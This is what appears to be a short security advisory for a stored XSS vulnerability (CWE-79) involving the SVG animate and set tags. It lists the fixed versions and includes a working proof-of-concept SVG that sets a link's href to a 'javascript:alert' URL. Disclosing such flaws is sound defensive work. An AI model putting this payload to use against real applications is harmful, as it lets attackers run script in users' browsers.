The following SVG will produce a link with a javascript scheme. If the user clicks this link, they will run it.
<svg xmlns="http://www.w3.org/2000/svg">
<a>
<set attributeName="href" to="javascript:alert('SET_XSS')"></set>
<text y="30">Click set</text>
</a>
</svg>
Allows stored XSS in applications that allow the animate and set tags.
Fixed in 3.3.3, 4.0.3, and 4.1.4
Do not enable the animate or set tags.
{
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-29T23:09:16Z",
"nvd_published_at": null,
"severity": "MODERATE"
}